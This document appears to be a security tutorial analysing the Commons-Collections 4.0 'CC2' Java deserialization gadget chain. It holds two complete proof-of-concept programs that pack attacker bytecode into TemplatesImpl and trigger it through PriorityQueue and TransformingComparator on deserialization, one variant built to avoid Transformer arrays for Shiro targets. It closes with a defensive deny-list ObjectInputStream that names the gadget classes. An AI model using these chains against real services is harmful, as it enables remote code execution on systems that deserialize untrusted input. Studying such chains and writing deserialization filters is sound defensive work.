Environment setup:
- Commons-Collections 4.0
- jdk8u65
Maven dependency coordinates:
```xml
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>
```
CC2 chain analysis:
Before analysing this chain, it helps to understand why it exists.
CC2 is actually built on CC4.

In fact, I had unintentionally written code similar to CC2 while working on CC2; the main difference is that CC2 calls the newTransformer method rather than going through TrAXFilter.
PoC:
```java
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public static void main(String[] args) throws Exception {
    // TemplatesImpl carrying the Calc class bytes; private fields are set via reflection
    TemplatesImpl templates = new TemplatesImpl();
    byte[] bytes = Files.readAllBytes(Paths.get("D:\\Language\\Java\\java_code\\Security\\serialize\\cc3\\target\\classes\\Calc.class"));
    setField(templates, "_name", "Calc");
    setField(templates, "_bytecodes", new byte[][]{bytes});
    setField(templates, "_tfactory", new TransformerFactoryImpl());

    // ConstantTransformer(templates) -> InvokerTransformer("newTransformer")
    Transformer[] transformers = {
            new ConstantTransformer(templates),
            new InvokerTransformer("newTransformer", new Class[]{}, new Object[]{})
    };
    ChainedTransformer<Object> chainedTransformer = new ChainedTransformer<>(transformers);

    // Build the queue with an empty chain first, so add() does not trigger the chain locally
    TransformingComparator transformingComparator = new TransformingComparator<>(new ChainedTransformer<>());
    PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);
    priorityQueue.add(1);
    priorityQueue.add(1);

    // Swap the real chain into the comparator's private "transformer" field afterwards
    Class<? extends TransformingComparator> transformingComparatorClass = transformingComparator.getClass();
    Field transformerField = transformingComparatorClass.getDeclaredField("transformer");
    transformerField.setAccessible(true);
    transformerField.set(transformingComparator, chainedTransformer);

    SerializeUtil.serialize(priorityQueue);
    SerializeUtil.unSerialize();
}

public static void setField(TemplatesImpl templates, String fieldName, Object value) throws Exception {
    Field declaredField = templates.getClass().getDeclaredField(fieldName);
    declaredField.setAccessible(true);
    declaredField.set(templates, value);
}
```
In some situations an array cannot be passed in at serialization time. For example, with the rewritten serialization used in Shiro deserialization, a Transformer array we pass in cannot be serialized.
So we rewrite the PoC as follows: construct an InvokerTransformer directly and let its transform method call newTransformer. The add method of PriorityQueue invokes transform indirectly through the comparator.
```java
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public static void main(String[] args) throws Exception {
    // Same TemplatesImpl preparation as in the first PoC
    TemplatesImpl templates = new TemplatesImpl();
    byte[] bytes = Files.readAllBytes(Paths.get("D:\\Language\\Java\\java_code\\Security\\serialize\\cc3\\target\\classes\\Calc.class"));
    setField(templates, "_name", "Calc");
    setField(templates, "_bytecodes", new byte[][]{bytes});
    setField(templates, "_tfactory", new TransformerFactoryImpl());

    // No Transformer array: a single InvokerTransformer whose input will be the queue element
    InvokerTransformer invokerTransformer = new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});

    // ConstantTransformer(1) keeps add() harmless; the elements themselves are the TemplatesImpl
    TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
    PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);
    priorityQueue.add(templates);
    priorityQueue.add(templates);

    // Replace the comparator's transformer with the InvokerTransformer after the elements are in place
    Class<? extends TransformingComparator> transformingComparatorClass = transformingComparator.getClass();
    Field transformerField = transformingComparatorClass.getDeclaredField("transformer");
    transformerField.setAccessible(true);
    transformerField.set(transformingComparator, invokerTransformer);

    SerializeUtil.serialize(priorityQueue);
    SerializeUtil.unSerialize();
}

public static void setField(TemplatesImpl templates, String fieldName, Object value) throws Exception {
    Field declaredField = templates.getClass().getDeclaredField(fieldName);
    declaredField.setAccessible(true);
    declaredField.set(templates, value);
}
```
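As an added defensive example that is not part of the original post: a look-ahead ObjectInputStream that rejects the classes this chain depends on inside resolveClass(), which runs when a class descriptor is read, before the object is instantiated and before PriorityQueue.readObject() can reach TransformingComparator.compare(). The deny-list prefixes and the readUntrusted helper are my assumptions and are not the post's SerializeUtil API.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;

// Added example (not from the original post). resolveClass() is called as each
// class descriptor is read, so a rejected class never gets instantiated and the
// comparator callback (compare -> transform -> newTransformer) never runs.
public class DenyListObjectInputStream extends ObjectInputStream {

    // Assumed deny list: the packages/classes the CC2 chain above relies on
    // (commons-collections 3.x uses org.apache.commons.collections., 4.x uses collections4.).
    private static final String[] DENIED_PREFIXES = {
            "org.apache.commons.collections4.",
            "org.apache.commons.collections.",
            "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"
    };

    public DenyListObjectInputStream(InputStream in) throws IOException {
        super(in);
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        String name = desc.getName();
        for (String prefix : DENIED_PREFIXES) {
            if (name.startsWith(prefix)) {
                // Fail closed: no Class object, no instance, no comparator callback
                throw new InvalidClassException(name, "rejected by deserialization deny list");
            }
        }
        return super.resolveClass(desc);
    }

    // Assumed helper: drop-in replacement for a plain ObjectInputStream.readObject()
    // on untrusted bytes, e.g. in the post's unSerialize() step.
    public static Object readUntrusted(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new DenyListObjectInputStream(new ByteArrayInputStream(data))) {
            return in.readObject();
        }
    }
}
```

On jdk8u65 as used here there is no JEP 290 filter; from 8u121 onward the same policy can be expressed with ObjectInputFilter instead. An allow list of the types the application actually expects is stronger than this deny list, which only covers the gadget classes named on this page.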